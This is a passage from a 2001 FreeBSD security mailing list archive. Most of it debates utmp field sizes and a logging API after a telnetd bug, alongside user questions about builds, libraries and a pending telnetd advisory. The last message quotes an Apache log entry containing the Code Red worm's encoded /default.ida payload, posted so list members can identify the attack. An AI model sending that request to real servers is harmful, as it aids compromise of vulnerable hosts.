2001 15:18:44 +0200 (CEST) From: "Jeroen Massar" To: "'Matt Dillon'" Cc: "'Brian Somers'" , "'Hajimu UMEMOTO'" , , , , , Subject: RE: RE: bin/22595: telnetd tricked into using arbitrary peer ip Date: Mon, 23 Jul 2001 15:14:40 +0200 Organization: Unfix Message-ID: <000f01c11379$72391a40$420d640a@HELL> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <200107230354.f6N3stj13517@earth.backplane.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Matt Dillon wrote: > All very nice, guys, but not realistic. Only FreeBSD uses an API. > Third party programs access the structure directly for the most > part so adding new fields to the structure will just cause more > garbage to be written to the file (many third party programs > don't bother to bzero the structure before writing it out). We > aren't going to add a separate hostname[] array... we just got > through ripping out the hostname crap, because there was never > enough room in the field to actually store the FQDN, and many > programs don't bother to verify the forward against the > reverse anyway so the data would be suspect. And short > of making a 200+ character array to hold it, which would be masive > bloat, there is no way to fit it in the structure. If > you want to store > host names for posterity you will have to log-process the file and > store the results somewhere else. Every program under > the sun assumes > utmp is a fixed-length structure. > > Pretty much our only option is to extend the size of > existing fields > and take the 'oh hell the structure size changed' hit. So... Because they didn't account for this 40 years ago we're stuck with it?? Another proposal, because I know what you mean with the 'old programs' problem which should have been fixed a long time ago with an API :) Quote from my other mail: 8<--- One thing that should be considered to be done if an API is created... : make a backport to previous versions of FreeBSD and actually *BSD/Linux/* :) This also encourages program writers/maintainers to adopt it quicker, as it's less hassle for them and they don't have to make the "pre-FreeBSD-5" case or something... And the best thing of an API (if done right :): seperation of the back and the frontend... which makes changes like this even easier... ---->8 But now... Make that API log into a different way and place... We will get two wtmp/utmp files then... But then we can let the 'old' 3rd party programs log to the 'old' utmp/wtmp facility. Whenever a 'new' program using the API queries the listing function of the API then the API will simply also check the 'old' facility... Et presto ... We have a solution :) The new solution could log to a database, file whatever you'd do with it.... Just make sure that it fits into an API... :) That's also one of the reasons I am kinda glad that intel simply made IA-64 not IA-32 compliant..... Away with the old stuff and backward compatibility you got emu's (or API's who know the old stuff :) for that... And Windows is going the same way too... NT != DOS ... Luckily :) Greets, Jeroen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 8:35: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 9517E37B401 for ; Mon, 23 Jul 2001 08:34:51 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id TAA89914; Mon, 23 Jul 2001 19:34:39 +0400 (MSD) Date: Mon, 23 Jul 2001 19:34:44 +0400 From: "Nickolay A.Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A.Kritsky" Organization: IHelp X-Priority: 3 (Normal) Message-ID: <47174164064.20010723193444@internethelp.ru> To: "Jeroen Massar" Cc: freebsd-security@FreeBSD.ORG Subject: Re[3]: bin/22595: telnetd tricked into using arbitrary peer ip In-reply-To: <000f01c11379$72391a40$420d640a@HELL> References: <000f01c11379$72391a40$420d640a@HELL> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Jeroen, Monday, July 23, 2001, 5:14:40 PM, you wrote: JM> Matt Dillon wrote: >> All very nice, guys, but not realistic. Only FreeBSD uses an API. >> Third party programs access the structure directly for the most >> part so adding new fields to the structure will just cause more >> garbage to be written to the file (many third party programs >> don't bother to bzero the structure before writing it out). We >> aren't going to add a separate hostname[] array... we just got >> through ripping out the hostname crap, because there was never >> enough room in the field to actually store the FQDN, and many >> programs don't bother to verify the forward against the >> reverse anyway so the data would be suspect. And short >> of making a 200+ character array to hold it, which would be masive >> bloat, there is no way to fit it in the structure. If >> you want to store >> host names for posterity you will have to log-process the file and >> store the results somewhere else. Every program under >> the sun assumes >> utmp is a fixed-length structure. >> >> Pretty much our only option is to extend the size of >> existing fields >> and take the 'oh hell the structure size changed' hit. JM> So... Because they didn't account for this 40 years ago we're stuck with JM> it?? JM> Another proposal, because I know what you mean with the 'old programs' JM> problem which should have been fixed a long time ago with an API :) JM> Quote from my other mail: JM> 8<--- JM> One thing that should be considered to be done if an API is created... : JM> make a backport to previous versions of FreeBSD and actually JM> *BSD/Linux/* :) JM> This also encourages program writers/maintainers to adopt it quicker, as JM> it's less hassle for them and they don't have to make the JM> "pre-FreeBSD-5" case or something... JM> And the best thing of an API (if done right :): seperation of the back JM> and the frontend... which makes changes like this even easier... ---->>8 JM> But now... Make that API log into a different way and place... JM> We will get two wtmp/utmp files then... But then we can let the 'old' JM> 3rd party programs log to the 'old' utmp/wtmp facility. JM> Whenever a 'new' program using the API queries the listing function of JM> the API then the API will simply also check the 'old' facility... Et JM> presto ... We have a solution :) JM> The new solution could log to a database, file whatever you'd do with JM> it.... Just make sure that it fits into an API... :) looks quite reasonable to me - I considered it is the common way of such problems solving. ;------------------------------------------- ; NKritsky ; SysAdmin InternetHelp.Ru ; http://www.internethelp.ru ; mailto:nkritsky@internethelp.ru JM> That's also one of the reasons I am kinda glad that intel simply made JM> IA-64 not IA-32 compliant..... Away with the old stuff and backward JM> compatibility you got emu's (or API's who know the old stuff :) for JM> that... And Windows is going the same way too... NT != DOS ... Luckily JM> :) JM> Greets, JM> Jeroen JM> To Unsubscribe: send mail to majordomo@FreeBSD.org JM> with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 8:38:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id DBD4337B403; Mon, 23 Jul 2001 08:38:42 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.11.4/8.11.4) id f6NFcZl81468; Mon, 23 Jul 2001 11:38:35 -0400 (EDT) (envelope-from wollman) Date: Mon, 23 Jul 2001 11:38:35 -0400 (EDT) From: Garrett Wollman Message-Id: <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu> To: Matt Dillon Cc: , Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip In-Reply-To: <200107230354.f6N3stj13517@earth.backplane.com> References: <000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > All very nice, guys, but not realistic. Only FreeBSD uses an API. Erm, no, wrong. SVR4 has an API. This API is standardized as a part of the Austin Group process. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 8:57:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id B7DE937B405; Mon, 23 Jul 2001 08:57:28 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6NFvQb17025; Mon, 23 Jul 2001 08:57:26 -0700 (PDT) (envelope-from dillon) Date: Mon, 23 Jul 2001 08:57:26 -0700 (PDT) From: Matt Dillon Message-Id: <200107231557.f6NFvQb17025@earth.backplane.com> To: Garrett Wollman Cc: , Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip References: <000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com> <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org : :< said: : :> All very nice, guys, but not realistic. Only FreeBSD uses an API. : :Erm, no, wrong. : :SVR4 has an API. This API is standardized as a part of the Austin :Group process. : :-GAWollman Fine.. then if you want to get all the third party program authors to use a magic API, be my guest. Could it be, no... it couldn't... all those programs couldn't just not *know* about the 'Austin Group process' could they? That's criminal! Oops, oh well so much for that! Even ssh, about the closest third party program to BSD as there ever was, doesn't use an API call for lastlog. It does for utmp, sort-of, but not for lastlog. Bzzzt. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 8:58:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id E323837B403; Mon, 23 Jul 2001 08:58:39 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6NFwTB17064; Mon, 23 Jul 2001 08:58:29 -0700 (PDT) (envelope-from dillon) Date: Mon, 23 Jul 2001 08:58:29 -0700 (PDT) From: Matt Dillon Message-Id: <200107231558.f6NFwTB17064@earth.backplane.com> To: Brian Somers Cc: Jeroen Massar , Brian Somers , Hajimu UMEMOTO , aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip References: <200107231117.f6NBHYg61233@hak.lan.Awfulhak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org : :Matt wrote: :> > Pretty much our only option is to extend the size of existing fields :> > and take the 'oh hell the structure size changed' hit. : :I wrote: :> Ok, I agree. I think we should bump UT_HOSTSIZE to 40 then and only :> put unscoped addresses in the field (ie, fec0::1, not fec0::1%vr0). :> :> Any disagreements ? Should this be brought up (explained) on -arch :> now ? : :Interestingly enough, OpenBSD has UT_HOSTSIZE set to 256. : :-- :Brian Heh. Are they still trying to store the FQDN? -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 8:59:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id B2B1037B403; Mon, 23 Jul 2001 08:59:52 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6NFxng17095; Mon, 23 Jul 2001 08:59:49 -0700 (PDT) (envelope-from dillon) Date: Mon, 23 Jul 2001 08:59:49 -0700 (PDT) From: Matt Dillon Message-Id: <200107231559.f6NFxng17095@earth.backplane.com> To: Brian Somers Cc: "Jeroen Massar" , "'Brian Somers'" , "'Hajimu UMEMOTO'" , aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG, brian@Awfulhak.org Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip References: <200107231012.f6NACgg60192@hak.lan.Awfulhak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org : :Ok, I agree. I think we should bump UT_HOSTSIZE to 40 then and only :put unscoped addresses in the field (ie, fec0::1, not fec0::1%vr0). : :Any disagreements ? Should this be brought up (explained) on -arch :now ? Make it 56, and you've got to put the whole IP address in the field, not the short form. Logs are often processed off-host and the short form wouldn't be useful. And we have to worry about X at some point. 40 isn't quite big enough. -Matt : :-- :Brian : http://www.freebsd-services.com/ :Don't _EVER_ lose your sense of humour ! : : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 9: 1: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from web13308.mail.yahoo.com (web13308.mail.yahoo.com [216.136.175.44]) by hub.freebsd.org (Postfix) with SMTP id 44AE137B403 for ; Mon, 23 Jul 2001 09:00:58 -0700 (PDT) (envelope-from ewancarr@yahoo.com) Message-ID: <20010723160056.98649.qmail@web13308.mail.yahoo.com> Received: from [158.234.10.144] by web13308.mail.yahoo.com via HTTP; Mon, 23 Jul 2001 17:00:56 BST Date: Mon, 23 Jul 2001 17:00:56 +0100 (BST) From: =?iso-8859-1?q?Ewan=20Carr?= Subject: libcrypto.o.2 To: FreeBSD-Security@FreeBSD.Org MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Any pointers on the problem below would be appreciated - ta ! Installed FreeBSD 4.2 successfully from CD Installed racoon (racoon-20010418a.tgz) from web successfully. When running racoon I get the following problem /usr/libexec/ld-elf.so.1 Shared object "libcrypto.so.2" not found ? Do I need an earlier version of racoon ? ps. could you cc ewancarr@yahoo.com - i do not subscribe to the list - thanks again ____________________________________________________________ Do You Yahoo!? Get your free @yahoo.co.uk address at http://mail.yahoo.co.uk or your free @yahoo.ie address at http://mail.yahoo.ie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 9:13:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from cpimssmtpu06.email.msn.com (cpimssmtpu06.email.msn.com [207.46.181.82]) by hub.freebsd.org (Postfix) with ESMTP id DD24C37B405; Mon, 23 Jul 2001 09:13:46 -0700 (PDT) (envelope-from JHowie@msn.com) Received: from x86w2kw1 ([216.103.48.12]) by cpimssmtpu06.email.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Mon, 23 Jul 2001 09:13:28 -0700 Message-ID: <00e001c11393$37995340$0101a8c0@development.local> From: "John Howie" To: "Matt Dillon" , "Garrett Wollman" Cc: , References: <000f01c11315$094851e0$420d640a@HELL><200107230354.f6N3stj13517@earth.backplane.com> <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu> <200107231557.f6NFvQb17025@earth.backplane.com> Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip Date: Mon, 23 Jul 2001 09:19:14 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-OriginalArrivalTime: 23 Jul 2001 16:13:28.0628 (UTC) FILETIME=[68BA5740:01C11392] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is getting off-topic for security but how about taking utmp and implementing it as a device? I haven't sat down and thought it all through but you could reasonably easily check the format of the data written to it (or at least check the size) to determine how to handle it, and likewise for the reads. That way you don't have to break your back trying to port all those third party apps. A daemon could pick up the processed data and write it to a log. Even better, have the information validated in the kernel before being logged. From a security perspective I have never liked the fact that crucial log files can just be written to by any old app that happens to run in root context. john... ----- Original Message ----- From: "Matt Dillon" To: "Garrett Wollman" Cc: ; Sent: Monday, July 23, 2001 8:57 AM Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip > > : > :< said: > : > :> All very nice, guys, but not realistic. Only FreeBSD uses an API. > : > :Erm, no, wrong. > : > :SVR4 has an API. This API is standardized as a part of the Austin > :Group process. > : > :-GAWollman > > Fine.. then if you want to get all the third party program authors to > use a magic API, be my guest. Could it be, no... it couldn't... > all those programs couldn't just not *know* about the 'Austin Group > process' could they? That's criminal! Oops, oh well so much for > that! > > Even ssh, about the closest third party program to BSD as there ever > was, doesn't use an API call for lastlog. It does for utmp, sort-of, > but not for lastlog. Bzzzt. > > -Matt > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 9:33:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from peace.mahoroba.org (peace.calm.imasy.or.jp [202.227.26.34]) by hub.freebsd.org (Postfix) with ESMTP id 73CEE37B40A; Mon, 23 Jul 2001 09:33:45 -0700 (PDT) (envelope-from ume@mahoroba.org) Received: from localhost (IDENT:1UujV5C/BrMGvbfWSlacUInHQ9jzznsNN7HadixyDUosgiHIfpXNV03GBtSezIqs@localhost [::1]) (authenticated as ume with CRAM-MD5) by peace.mahoroba.org (8.11.4/8.11.4/peace) with ESMTP/inet6 id f6NGVkY93428; Tue, 24 Jul 2001 01:31:46 +0900 (JST) (envelope-from ume@mahoroba.org) Date: Tue, 24 Jul 2001 01:31:41 +0900 (JST) Message-Id: <20010724.013141.74694496.ume@mahoroba.org> To: dillon@earth.backplane.com Cc: brian@Awfulhak.org, jeroen@unfix.org, brian@freebsd-services.com, aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip From: Hajimu UMEMOTO In-Reply-To: <200107231558.f6NFwTB17064@earth.backplane.com> References: <200107231117.f6NBHYg61233@hak.lan.Awfulhak.org> <200107231558.f6NFwTB17064@earth.backplane.com> X-Mailer: xcite1.38> Mew version 1.95b119 on Emacs 20.7 / Mule 4.0 =?iso-2022-jp?B?KBskQjJWMWMbKEIp?= X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91 05 D0 B3 EF 36 9B 6A BC X-URL: http://www.imasy.org/~ume/ X-Operating-System: FreeBSD 5.0-CURRENT Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> On Mon, 23 Jul 2001 08:58:29 -0700 (PDT) >>>>> Matt Dillon said: dillon> :Interestingly enough, OpenBSD has UT_HOSTSIZE set to 256. I think they prepare new protocol in the future. -- Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org http://www.imasy.org/~ume/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 9:50:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id F072A37B407; Mon, 23 Jul 2001 09:50:07 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.11.4/8.11.4) id f6NGnq982448; Mon, 23 Jul 2001 12:49:52 -0400 (EDT) (envelope-from wollman) Date: Mon, 23 Jul 2001 12:49:52 -0400 (EDT) From: Garrett Wollman Message-Id: <200107231649.f6NGnq982448@khavrinen.lcs.mit.edu> To: Matt Dillon Cc: , Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip In-Reply-To: <200107231557.f6NFvQb17025@earth.backplane.com> References: <000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com> <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu> <200107231557.f6NFvQb17025@earth.backplane.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > Fine.. then if you want to get all the third party program authors to > use a magic API, be my guest. If they run on Solaris -- which most of them do -- then they already do. Nice try, Matt, but far off the mark. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 9:51:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp03.mrf.mail.rcn.net (smtp03.mrf.mail.rcn.net [207.172.4.62]) by hub.freebsd.org (Postfix) with ESMTP id EC8AB37B40A for ; Mon, 23 Jul 2001 09:51:21 -0700 (PDT) (envelope-from jolt-mail@nicholasofmyra.org) Received: from 207-172-109-89.s89.tnt1.war.va.dialup.rcn.com ([207.172.109.89] helo=compops1.nicholasofmyra.org) by smtp03.mrf.mail.rcn.net with esmtp (Exim 3.31 #3) id 15OivO-0004MO-00 for freebsd-security@freebsd.org; Mon, 23 Jul 2001 12:51:19 -0400 Message-Id: <5.1.0.14.0.20010723123615.00aebd90@10.100.0.5> X-Sender: jolt@joseph.nicholasofmyra.org (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Mon, 23 Jul 2001 12:53:33 -0400 To: freebsd-security@freebsd.org From: Joseph Subject: Make world - crypt-blowfish.c error Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm not sure what, if anything, I'm doing wrong. I've installed FreeBSD 4.3 with the src tree. I could do a make world fine after the initial installation. I cvsup'ed, and now I keep getting this error. make world or cd /usr/src/lib/libcrypt/ make results in: make: don't know how to make crypt-blowfish.c. Stop Any suggestions? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 10: 7: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from kira.epconline.net (kira2.epconline.net [209.83.132.2]) by hub.freebsd.org (Postfix) with ESMTP id 41CB637B40D for ; Mon, 23 Jul 2001 10:06:51 -0700 (PDT) (envelope-from carock@epconline.net) Received: from therock (betterguard.epconline.net [207.206.185.193]) by kira.epconline.net (8.11.4/8.11.4) with SMTP id f6NH6oX66448 for ; Mon, 23 Jul 2001 12:06:50 -0500 (CDT) From: "Chuck Rock" To: Subject: RE: telnetd root exploit Date: Mon, 23 Jul 2001 12:06:50 -0500 Message-ID: <004d01c11399$dd3d9850$1805010a@epconline.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-Mimeole: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <20010722120932.E56521@osaka.louisville.edu> Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Until an official advisory is released, does that mean there's no official patch yet? I'm new to patches, and was looking for them on the FTP site, but they are all listed by the advisory number... Chuck > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Keith Stevenson > Sent: Sunday, July 22, 2001 11:10 AM > To: Kris Kennaway > Cc: security@FreeBSD.ORG > Subject: Re: telnetd root exploit > > > On Sat, Jul 21, 2001 at 02:53:55PM -0700, Kris Kennaway wrote: > > On Sat, Jul 21, 2001 at 02:50:05PM -0700, Holtor wrote: > > > Any idea when the official advisory will be sent? > > > I don't want to think i'm patched and restart telnetd > > > only to be rooted by some lame script kiddie. Thanks > > > much. > > > > Probably Monday. > > I have a small suggestion for this and future advisories. Could > you include > which file versions are "fixed"? For example, in addition to stating that > the problem was resolved on a certain date, also include that the > fix is in > foo.c version (mumble). It would help make certain that I am > indeed patched. > (Yes, I do read the commit messages, but I've been known to miss these > things.) > > Regards, > --Keith Stevenson-- > > -- > Keith Stevenson > System Programmer - Data Center Services - University of Louisville > keith.stevenson@louisville.edu > GPG key fingerprint = 332D 97F0 6321 F00F 8EE7 2D44 00D8 F384 75BB 89AE > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 10: 8:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id D860037B406; Mon, 23 Jul 2001 10:08:01 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6NH7wU18016; Mon, 23 Jul 2001 10:07:58 -0700 (PDT) (envelope-from dillon) Date: Mon, 23 Jul 2001 10:07:58 -0700 (PDT) From: Matt Dillon Message-Id: <200107231707.f6NH7wU18016@earth.backplane.com> To: Garrett Wollman Cc: , Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip References: <000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com> <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu> <200107231557.f6NFvQb17025@earth.backplane.com> <200107231649.f6NGnq982448@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org : :< said: : :> Fine.. then if you want to get all the third party program authors to :> use a magic API, be my guest. : :If they run on Solaris -- which most of them do -- then they already :do. Nice try, Matt, but far off the mark. : :-GAWollman Really.. Lets see. wu-ftpd... nope. proftpd... nope. Want me to continue? -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 10: 8:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from d170h113.resnet.uconn.edu (d170h113.resnet.uconn.edu [137.99.170.113]) by hub.freebsd.org (Postfix) with SMTP id 50D7E37B408 for ; Mon, 23 Jul 2001 10:08:22 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 12349 invoked by uid 1001); 23 Jul 2001 17:15:29 -0000 Message-ID: <20010723171529.12348.qmail@d170h113.resnet.uconn.edu> References: <20010721204942.12010.qmail@salvation.unixgeeks.com> <20010721145417.A86996@networkcommand.com> In-Reply-To: <20010721145417.A86996@networkcommand.com> From: "Peter C. Lai" To: "jono@networkcommand.com" Cc: nathan@salvation.unixgeeks.com, freebsd-security@FreeBSD.ORG Subject: Re: Reinfection phase Re: possible? Date: Mon, 23 Jul 2001 17:15:28 GMT Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org my apache logs also show a crapload of "Malformed Headers" from the same IP blocks which i suspect is from code red attempts. Jon O . writes: > > I justed wanted to make sure everyone was aware that Code Red is supposed > to restart its infection phase on 8.01.01. > > www.eeye.com has a good write up on this and the rest of the worm. > > Watch out for their scanner tool though, it's a windows binary and there > is no source... > > > > > > On 21-Jul-2001, nathan@salvation.unixgeeks.com wrote: >> >> okay, today i checked my apache logs this is what i got: >> >> 195.10.116.2 - - [19/Jul/2001:15:50:20 -0700] "GET /default.ida?NNNNNNNNNNNNNNNN >> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u >> 6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 >> 1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 332 >> >> this same exact get request came from several different address as well. such >> as: 128.138.105.172, 202.157.154.126, and a couple of others. any ideas? any >> remote exploits in apache i've missed? i'm running Apache/1.3.19 Server.. >> >> thanks in advance, >> nathan. >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ----------- Peter C. Lai University of Connecticut Dept. of Residential Life | Programmer Dept. of Molecular and Cell Biology | Undergraduate Research Assistant/Honors Program http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with 